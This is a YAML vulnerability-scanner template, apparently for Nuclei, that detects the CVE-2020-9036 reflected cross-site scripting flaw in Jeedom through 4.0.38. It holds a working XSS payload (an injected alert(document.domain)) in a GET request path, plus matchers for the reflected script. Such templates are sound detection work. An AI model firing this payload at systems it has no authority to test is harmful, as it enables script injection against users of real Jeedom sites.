44 lines
1.2 KiB
YAML
44 lines
1.2 KiB
YAML
id: CVE-2020-9036
|
|
|
|
info:
|
|
name: Jeedom <=4.0.38 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
|
|
reference:
|
|
- https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-9036
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-9036
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00106
|
|
tags: cve,cve2020,xss,jeedom
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '<script>document.title = "";alert(document.domain);" - Jeedom"</script>'
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
# Enhanced by mp on 2022/09/02
|